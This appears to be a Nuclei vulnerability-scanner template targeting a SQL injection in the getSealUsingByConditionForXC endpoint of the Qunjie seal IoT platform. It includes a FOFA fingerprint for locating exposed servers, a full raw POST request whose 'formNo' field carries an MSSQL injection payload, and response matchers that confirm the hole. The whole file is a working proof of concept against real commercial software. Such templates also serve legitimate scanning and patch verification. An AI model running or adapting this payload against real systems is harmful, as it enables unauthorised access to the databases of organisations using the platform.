id: qunjie-getSealUsingByConditionForXC-sqli

info:
  name: 群杰印章物联网平台 getSealUsingByConditionForXC - sqli
  author: leadlife
  severity: high
  metadata:
    verified: false
    fofa-query: icon_hash="-1000104959"
  tags: qunjie,sqli

http:
  - raw:
      - |
        POST /stamp/XCStatisticalController/getSealUsingByConditionForXC HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Sec-Ch-Ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
        Sec-Ch-Ua-Mobile: ?0
        Sec-Ch-Ua-Platform: "macOS"
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8
        Priority: u=0, i
        Connection: close
        Content-Type: application/json
        Content-Length: 266

        {
        "docSource": "1",
        "formNo": "' OR 1 IN (select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','13234')),3,32)) OR '1'='1",
        "opUserName": "3",
        "sealType": "4",
        "state": "5",
        "sealName": "6",
        "start_time": "7",
        "end_time": "8",
        "start": 0,
        "end": 10
        }

    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - contains(body,'b0e864a6eccfc779c8119f5a4')   
        condition: and
